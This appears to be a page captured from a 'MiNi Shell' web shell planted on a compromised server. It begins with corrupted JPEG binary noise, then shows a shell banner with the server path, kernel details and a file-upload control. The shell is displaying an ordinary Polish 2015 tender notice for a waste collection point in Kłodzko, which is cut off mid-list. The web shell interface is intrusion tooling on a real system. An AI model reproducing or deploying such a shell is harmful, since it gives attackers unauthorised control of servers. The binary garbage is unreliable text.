JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151207/333024-N-2015.html

<p class="kh_header"><b>Kłodzko: Utworzenie i prowadzenie Punktu Selektywnego Zbierania Odpadów Komunalnych na terenie Gminy Miasta Kłodzka</b><br>
<b>Numer ogłoszenia: 333024 - 2015; data zamieszczenia: 07.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kłodzko , pl. Bolesława Chrobrego 1, 57-300 Kłodzko, woj. dolnośląskie, tel. 074/8654600, faks 074 8674062.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.klodzko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utworzenie i prowadzenie Punktu Selektywnego Zbierania Odpadów Komunalnych na terenie Gminy Miasta Kłodzka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utworzenie i prowadzenie Punktu Selektywnego Zbierania Odpadów Komunalnych na terenie Gminy Miasta Kłodzka, na terenie nieruchomości będącej własnością Wykonawcy, bądź będącej w jego posiadaniu. Punkt Selektywnego Zbierania Odpadów Komunalnych, zwany w dalszej części PSZOK, będzie miejscem zbiórki i czasowego magazynowania odpadów selektywnie zebranych, zawartych we frakcji odpadów komunalnych, dostarczanych przez właścicieli nieruchomości objętych gminnym systemem gospodarowania odpadami komunalnymi tj. nieruchomości zamieszkałe i niezamieszkałe. Odpady zebrane w PSZOK będą przekazywane do instalacji odzysku lub unieszkodliwiania odpadów, zgodnie z hierarchią sposobów postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r. o odpadach Dz. U. z 2013 r. poz.21 z poźn. zm. 

Przedmiot zamówienia będzie realizowany od 01.01.2016 r. do dnia 30.06.2017 r. 
Rodzaje i przewidywane ilości odpadów zbieranych w PSZOK
Zamawiający wymaga, aby w PSZOK były zbierane selektywnie następujące rodzaje odpadów komunalnych, zgodnie z zapisami:
uchwały nr XII882015 Rady Miejskiej w Kłodzku z dnia 27 sierpnia 2015 r. w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Miasta Kłodzka Dz. Urz. Woj. Doln.  z 2015 r. poz. 3714,
uchwały nr XII892015 Rady Miejskiej w Kłodzku z dnia 27 sierpnia 2015 r. w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi Dz. Urz. Woj. Doln. z 2015 r., poz. 3715,
papier,metale,tworzywa sztuczne,szkło,opakowania wielomateriałowe,
odpady ulegające biodegradacji, w tym odpady opakowaniowe ulegające biodegradacji,odpady zielone,zużyty sprzęt elektryczny i elektroniczny,zużyte baterie i akumulatory,odpady budowlane i rozbiórkowe stanowiące odpady komunalne,meble i inne odpady wielkogabarytowe,zużyte opony,przeterminowane leki i chemikalia,
inne odpady niebezpieczne powstające w gospodarstwach domowych.
Kody odpadów selektywnie zbieranych w PSZOK zawiera załącznik nr 1 do SIWZ.
Zamawiający informuje, że w prowadzonym Punkcie Selektywnego Zbierania Odpadów na terenie Miasta Kłodzka zostały zebrane następujące ilości opadów: 
Tab.1. Ilość poszczególnych rodzajów odpadów komunalnych zebranych w PSZOK,w poszczególnych latach:
Rodzaj odbieranej frakcji odpadów	Ilość odpadów, jaka została zebrana w PSZOK1 Mg
2 półrocze 2013 r. 	Rok 2014	styczeń - wrzesień 2015 r . 
papier
0,125	0,4	0,73
metale
0,025	0,04	0,03
tworzywa sztuczne 
0,295	1,81	0,28
szkło
0,645	1,53	1,18
opakowania wielomateriałowe
0	0	0
tekstylia
0,215	0,32	0,14
odpady zielone
0,7	12,44	12,42
zużyty sprzęt elektryczny i elektroniczny
0,972	2,15	1,23
zużyte baterie i akumulatory 
0	0	0
odpady budowlane i rozbiórkowe
3,522	15,89	9,98
meble i inne odpady wielkogabarytowe
1,465	9,27	6,12
drewno	0,11	0,97	0,79
zużyte opony
0,238	0,43	0,49
chemikalia
	0	0,12	0,27
Inne odpady niebezpieczne powstające w gospodarstwach domowych0,065	0	0
 Razem: 	18,377	45,37	33,66
1 Źródło: Sprawozdania podmiotu prowadzącego Punkt Selektywnego Zbierania Odpadów w Kłodzku. 

Zamawiający zastrzega, że w trakcie realizacji usługi możliwe są więc zmiany ilości odpadów przyjmowanych do PSZOK. Zmiany te mogą dotyczyć zarówno zmniejszenia, jak i zwiększenia ilości odpadów. Zmiany te nie będą wpływały na wysokość wynagrodzenia Wykonawcy.
Mając na uwadze wprowadzone zmiany w przepisach prawa miejscowego dotyczące odbioru odpadów u źródła typu: meble i odpady wielkogabarytowe, zużyte opony oraz odpady zielone należy uwzględnić, że ilość przedmiotowych odpadów przyjmowanych przez PSZOK może mieć tendencję spadkową. 
Sposoby postępowania z odpadami zgromadzonymi w PSZOK.

Odpady należy gromadzić selektywnie w przygotowanych do tego celu pojemnikachkontenerach w odpowiednio przygotowanych miejscach z uwzględnieniem wszystkich przepisów stanowiących o sposobie magazynowania poszczególnych rodzajów odpadów.

Podmiot prowadzący punkt selektywnego zbierania odpadów komunalnych jest obowiązany do:
przekazywania bezpośrednio lub za pośrednictwem innego zbierającego odpady przyjętych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych do instalacji odzysku lub unieszkodliwiania odpadów, zgodnie                   z hierarchią sposobów postępowania z odpadami, o której mowa w art. 17 ustawy       z dnia 14 grudnia 2012 r. o odpadach
przekazywania przyjętych od właścicieli nieruchomości odpadów zielonych bezpośrednio do regionalnej instalacji do przetwarzania odpadów komunalnych.  

Zgromadzone w pojemnikach kontenerach odpady powinny zostać przekazane, w takim czasie, aby nie doprowadzić do przepełnienia tych pojemników kontenerów.
Gromadzenie odpadów zielonych i biodegradowalnych nie może powodować uciążliwości zapachowych i nie mogą one być przetrzymywane na terenie PSZOK dłużej niż 7 dni.
Opis miejsca lokalizacji PSZOK oraz jego wyposażenia.

Teren, na którym będzie prowadzony PSZOK musi być:
położony w miejscu ogólnie dostępnym dla właścicieli nieruchomości objętych systemem gospodarowania odpadami komunalnymi;
o powierzchni minimum 500 m2;
ogrodzony, tak aby uniemożliwić wstęp osobom nieupoważnionym;
oświetlony,
wyposażony w stałą legalizowaną wagę umożliwiającą określenie ilości odpadów przyjmowanych do PSZOK
wyposażony w obiekt socjalno-administracyjny;
oznakowany tablicami lub banerami informacyjnymi, wykonanymi w taki sposób, aby informacje były czytelne i zawierały dane:
nazwę: Punkt Selektywnego Zbierania Odpadów Komunalnych,
godziny i dni otwarcia,
nazwa, adres i numer telefonu Wykonawcy,
przygotowany w sposób spełniający wymogi przeciwpożarowe oraz z zachowaniem przepisów bezpieczeństwa i higieny pracy

PSZOK powinien być wyposażony w następujące rodzaje pojemników kontenerów:
Pojemniki kontenery powinny być oznakowane w sposób niebudzący wątpliwości, jakie odpady należy w nich umieszczać.
Dopuszcza się, aby pojemniki przeznaczone do selektywnego zbierania odpadów oznaczone były według następujących kolorów:
żółty tworzywa sztuczne, metale,
zielony, biały szkło;
niebieski  papier, opakowania wielomateriałowe;
brązowy odpady ulegające biodegradacji.
 
Tab. 3. Minimalne wymagania w zakresie pojemników i kontenerów przeznaczonych do zbierania   odpadów w PSZOK.  
Lp.Rodzaj odbieranego odpadu	Rodzaj pojemnika	Minimalna ilość danego rodzaju pojemnika

papier	pojemnik zamykany o min. poj. 1100 l	1
metale 	pojemnik zamykany o min. poj. 1100 l	1
tworzywa sztuczne	pojemnik zamykany o min. poj. 1100 l 	1
szkło	pojemnik zamykany o min. poj. 1100 l	1
opakowania wielomateriałowe	pojemnik zamykany o min. poj. 1100 l1
odpady ulegające biodegradacji, w tym odpady opakowaniowe ulegające biodegradacji 	pojemnik o min. pojemności 1100 l	1
odpady zielone	kontener otwarty o min. poj. 7 m 3	1
zużyty sprzęt elektryczny i elektroniczny kontener zamknięty o min. poj. 10 m3 	1	
zużyte baterie i akumulatory	pojemnik specjalistyczny zamykany o min. poj. 60 l na zużyte baterie	1
pojemnik specjalistyczny o min. poj. 100 l na akumulatory 	1
odpady budowlane i rozbiórkowe	kontener otwarty o  min. poj. 7 m 3 4
meble i inne odpady wielkogabarytowe	kontener otwarty o min. poj. 7 m3 	1
przeterminowane leki	pojemnik specjalistyczny zamknięty i zabezpieczony przed dostępem osób trzecich o min. poj. 60 l	1
chemikalia 	pojemnik specjalistyczny odporny na działanie związków chemicznych o min. poj. 60 l	2
inne odpady niebezpieczne powstające w gospodarstwach domowych  pojemnik specjalistyczny przeznaczony na odpady zawierające rtęć i inne substancje niebezpieczne o min. poj. 60 l	2
 zużyte opony	wydzielony utwardzony teren	

4.Opis funkcjonowania Punktu Selektywnego Zbierania Odpadów Komunalnych

Punkt będzie czynny od poniedziałku do piątku w godzinach: od godz. 10:00 do godz. 18:00 oraz w sobotę w godzinach od 10:00 do 14:00.
W tym czasie na miejscu musi być obecny minimum jeden pracownik obsługi PSZOK.

W ramach prowadzenia PSZOK Wykonawca zobowiązany jest do:
przyjmowania odpadów od właścicieli nieruchomości objętych gminnym systemem gospodarowania odpadami komunalnymi oraz wskazywania miejsc przeznaczonych do ich gromadzenia
wydawania formularza przekazania odpadu i nadzoru nad prawidłowością jego wypełnienia
ważenia odpadów oddawanych przez właścicieli nieruchomości objętych gminnym systemem gospodarowania odpadami komunalnymi 
prowadzenia ewidencji właścicieli nieruchomości
prowadzenia ewidencji ilościowej i rodzajowej odpadów przekazanych do odpowiednich instalacji
utrzymywania czystości i porządku na terenie PSZOK, poprzez bieżące sprzątanie terenu oraz w przypadku wystąpienia opadów śniegu  odśnieżanie, w przypadku wystąpienia śliskości -usuwanie jej
zapewnienia kontaktu telefonicznego z obsługą PSZOK w czasie otwarcia  dla wszystkich właścicieli nieruchomości objętych gminnym systemem gospodarowania odpadami komunalnymi oraz Zamawiającego, a także poza godzinami otwarcia PSZOK  dla Zamawiającego
przekazywania odpadów zgromadzonych w PSZOK do zagospodarowania z minimalną częstotliwością wskazaną w pkt 2.
Regulamin funkcjonowania Punktu Selektywnego Zbierania Odpadów Komunalnych oraz wzór formularza przekazania odpadu zawiera załącznik nr 2 do SIWZ.
Zamawiający zastrzega sobie prawo do wprowadzenia zmian do regulaminu funkcjonowania PSZOK w trakcie świadczenia usługi przez Wykonawcę, w szczególności w zakresie:
rodzaju odpadów komunalnych przyjmowanych do PSZOK
godzin otwarcia PSZOK, przy czym Zamawiający zastrzega, że tygodniowy czas pracy PSZOK nie ulegnie wydłużeniu.
w przypadku zmiany przepisów prawa miejscowego jak i powszechnie obowiązującego 
w zakresie jakim dotyczą one przedmiotu zamówienia.
Sprawozdawczość.
Zamawiający wymaga, aby z prowadzonych czynności w PSZOK składane były kwartalne sprawozdania. 
Sprawozdanie kwartalne powinno zawierać następujące informacje:

nazwa i adres podmiotu prowadzącego PSZOK,
imię i nazwisko osoby odpowiedzialnej za sporządzenie sprawozdania,
nr telefonu kontaktowego,
okres, za  który sprawozdanie jest składane,
ewidencję osób, które dostarczyły odpady do PSZOK,
ewidencję odpadów przyjętych do PSZOK z określeniem rodzaju i ilości przyjętych odpadów,
informację o miejscu, sposobie, rodzaju i masie odpadów poddanych poszczególnym sposobom zagospodarowania.

Sprawozdanie kwartalne Wykonawca zobowiązany jest dostarczyć w terminie do 14 dnia miesiąca następującego po miesiącu rozliczeniowym.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.13.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca przystępujący do przetargu obowiązany jest wnieść wadium                                w wysokości - 2 000 zł.  Wadium może być wniesione w formach przewidzianych w art. 45 ust 6 ustawy PZP:
pieniądzu;
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn.zm.)
3.Wadium wniesione w pieniądzach Wykonawca wpłaca przelewem na rachunek Zamawiającego PBS w Strzelinie o Kłodzko -  28 9588 0004 7100 1010 2000 0050,                   z adnotacją  Utworzenie i prowadzenie Punktu Selektywnego Zbierania Odpadów Komunalnych na terenie Gminy Miasta Kłodzka. Jeżeli Wykonawca wnosi wadium                w pieniądzu, musi je wpłacić odpowiednio wcześniej, tak aby znalazło się ono na koncie Zamawiającego przed datą i godziną składania ofert.
4.Termin wniesienia wadium upływa wraz z terminem składania ofert. 
5.W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia,
dokument winien być sporządzony zgodnie z obowiązującym prawem. 
6.Zasady zwrotu oraz zatrzymania wadium przez Zamawiającego określa art.46 ustawy   PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że posiada uprawnienia do wykonywania określonej działalności lub czynności związanej z wykonaniem zamówienia, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień, a w szczególności:
a)	posiadają zezwolenie na zbieranie odpadów wydane przez organ właściwy ze względu na miejsce zbierania odpadów, o którym mowa w art. 41 lub w art. 232 ust. 1  ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013 r. poz. 21 z późn. zm.), co najmniej w zakresie odpadów o kodach wymienionych w załączniku nr 1 w punkcie 1 do SIWZ;
b)	posiadają wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny                 i elektroniczny, o którym mowa w art. 49 ust. 1 ustawy z dnia 14 grudnia 2012 r.      (Dz. U. z 2013 r. poz. 21 z późn. zm.) prowadzonego przez Marszałka Województwa lub przez Głównego Inspektora Ochrony Środowiska, do czasu utworzenia ww. rejestru przez Marszałka Województwa, zgodnie z art. 235 ust. 2 ww. ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że posiada wiedzę i doświadczenie tzn. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie Wykonawca wykonał lub wykonuje co najmniej jedną usługę zbierania odpadów segregowanych uwzgledniających, co najmniej trzy frakcje będące przedmiotem zamówienia i przekazywania ich do miejsca zagospodarowania w ilości nie mniejszej niż 0,5 Mg łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tzn.:
1)	Wykonawca wykaże, że dysponuje następującym potencjałem technicznym:
a)	pojemnikami do gromadzenia odpadów segregowanych o pojemności 1100 l, minimum 6 szt.
Dopuszcza się, aby pojemniki przeznaczone do selektywnego zbierania odpadów oznaczone były według następujących kolorów:
-	żółty - tworzywa sztuczne, metale,
-	zielony, biały - szkło;
-	niebieski - papier, opakowania wielomateriałowe;
-	brązowy - odpady ulegające biodegradacji.
b)	kontenerem do gromadzenia odpadów budowlanych i remontowych - min. 4 szt.
c)	kontenerem na odpady zielone - min. 1 szt.
d)	pojemnikiem na przeterminowane leki - min. 1 szt.
e)	pojemnikiem na odpady niebezpieczne powstające w gospodarstwach domowych - min. 4 szt.
f)	pojemnikiem na zużyte baterie - min. 1 szt.
g)	pojemnikiem na zużyte akumulatory - min. 1szt.
h)	kontenerem do gromadzenia odpadów zużytego sprzętu elektrycznego                          i elektronicznego - minimum 1szt. 
i)	   kontenerem do gromadzenia odpadów wielkogabarytowych- min. 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, tzn.:

	minimum 1 osobą nadzoru, odpowiedzialną za właściwą jakość świadczonej usługi 
i sprawozdawczość, posiadającą co najmniej wykształcenie średnie oraz minimum roczne doświadczenie w pracy na stanowisku związanym z gospodarką odpadami komunalnymi;
	  minimum 1 osobą, zatrudnioną na stanowisku obsługi PSZOK, posiadającą co najmniej wykształcenie zawodowe oraz przeszkoloną w zakresie gospodarki odpadami komunalnymi.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że znajduje się w sytuacji ekonomiczno - finansowej.

Wykonawca wykaże, że:
a)	posiada środki finansowe lub zdolność kredytową na kwotę minimum 50 000,00 zł
b)	jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia w wysokości nie niższej niż 50 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług, w okresie ostatnich 3 lat  przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy lub usługi zostały wykonane działań polegających na odbieraniu odpadów segregowanych w ilości nie mniejszej niż  0,5 Mg łącznie, wzór wykazu stanowi załącznik nr 6 do SIWZ.                                                                                              
Dowodami, ze usługi zostały lub są wykonywane należycie są:
poświadczenie np. poświadczenie wydane przez podmiot, który przyjął           od Wykonawcy odpady do zagospodarowania, z którego wynikać będzie ilość   i rodzaj odpadów przekazanych do zagospodarowania, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na trzy miesiące przed upływem terminu składania ofert,
oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać ww. poświadczenia.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
